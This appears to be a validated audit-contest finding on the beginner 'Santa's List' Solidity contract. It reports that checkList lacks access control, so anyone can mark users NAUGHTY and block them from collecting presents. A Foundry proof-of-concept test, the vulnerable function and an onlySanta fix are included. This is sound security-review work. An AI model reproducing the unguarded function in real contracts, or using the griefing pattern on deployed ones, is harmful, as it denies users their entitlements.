First Flight #5: Santa's List
First Flight #5
Beginner FriendlyFoundry
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Anyone can stop any member of the list from collecting their presents by calling `checkList` with changing the `Status.NAUGHTY`

naman1729

Summary

  • Anyone can stop all members of the list from collecting their presents by calling checkList with changing the Status.NAUGHTY for all addresses which distributes s_theListCheckedOnce.

Vulnerability Details

  • Bellow is the test which shows that anyone can stop either one or all member of the list from collecting their presents by calling checkList with changing the Status.NAUGHTY for all addresses then calling collectPresent will revert with SantasList__NotNice error.

function testTocheckAnyoneCanChangeTheStatusToStopTheCollectionOfPresent() public {
vm.startPrank(santa);
santasList.checkList(user, SantasList.Status.NICE);
santasList.checkTwice(user, SantasList.Status.NICE);
vm.stopPrank();
vm.startPrank(hawks);
santasList.checkList(user, SantasList.Status.NAUGHTY);
vm.stopPrank();
vm.warp(santasList.CHRISTMAS_2023_BLOCK_TIME() + 1);
vm.startPrank(user);
vm.expectRevert(SantasList.SantasList__NotNice.selector);
santasList.collectPresent();
vm.stopPrank();
}

  • Here is the code which shows that checkList can be called by anyone and it will change the Status of the address

/*
* @notice Do a first pass on someone if they are naughty or nice.
@> * Only callable by santa
*
* @param person The person to check
* @param status The status of the person
*/
@> function checkList(address person, Status status) external {
s_theListCheckedOnce[person] = status;
emit CheckedOnce(person, status);
}

  • Here is the code which shows that collectPresent will revert if the Status of the address is not Status.NICE or Status.EXTRA_NICE.
    for example if santa marked the address as Status.NICE in s_theListCheckedOnce and s_theListCheckedTwice by calling checkList and
    checkTwice respectively then anyone can call checkList and change the Status to Status.NAUGHTY which will revert on calling
    collectPresent with SantasList__NotNice error. both the checks marked below .

Click to show `collectPresent` funtion.
/*
* @notice Collect your present if you are nice or extra nice. You get extra presents if you are extra nice.
* - Nice: Collect an NFT
* - Extra Nice: Collect an NFT and a SantaToken
* This should not be callable until Christmas 2023 (give or take 24 hours), and addresses should not be able to collect more than once.
*/
function collectPresent() external {
if (block.timestamp < CHRISTMAS_2023_BLOCK_TIME) {
revert SantasList__NotChristmasYet();
}
if (balanceOf(msg.sender) > 0) {
revert SantasList__AlreadyCollected();
}
@> if (s_theListCheckedOnce[msg.sender] == Status.NICE && s_theListCheckedTwice[msg.sender] == Status.NICE) {
_mintAndIncrement();
return;
} else if (
@> s_theListCheckedOnce[msg.sender] == Status.EXTRA_NICE
&& s_theListCheckedTwice[msg.sender] == Status.EXTRA_NICE
) {
_mintAndIncrement();
i_santaToken.mint(msg.sender);
return;
}
revert SantasList__NotNice();
}

Impact

  • Anyone can stop either one or all member of the list from collecting their presents by calling checkList with changing the Status.NAUGHTY for all addresses which distributes s_theListCheckedOnce.

Tools Used

  • Manual Review

  • foundry

Recommendations

  • checkList should be called by santa only.

/*
* @notice Do a first pass on someone if they are naughty or nice.
* Only callable by santa
*
* @param person The person to check
* @param status The status of the person
*/
- function checkList(address person, Status status) external {
+ function checkList(address person, Status status) external onlySanta {
s_theListCheckedOnce[person] = status;
emit CheckedOnce(person, status);
}
Updates

Lead Judging Commences

inallhonesty Lead Judge almost 2 years ago
Submission Judgement Published
Validated
Assigned finding tags:

Access Control on checkList()

Anyone is able to call checkList() changing the status of a provided address. This is not intended functionality and is meant to be callable by only Santa.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.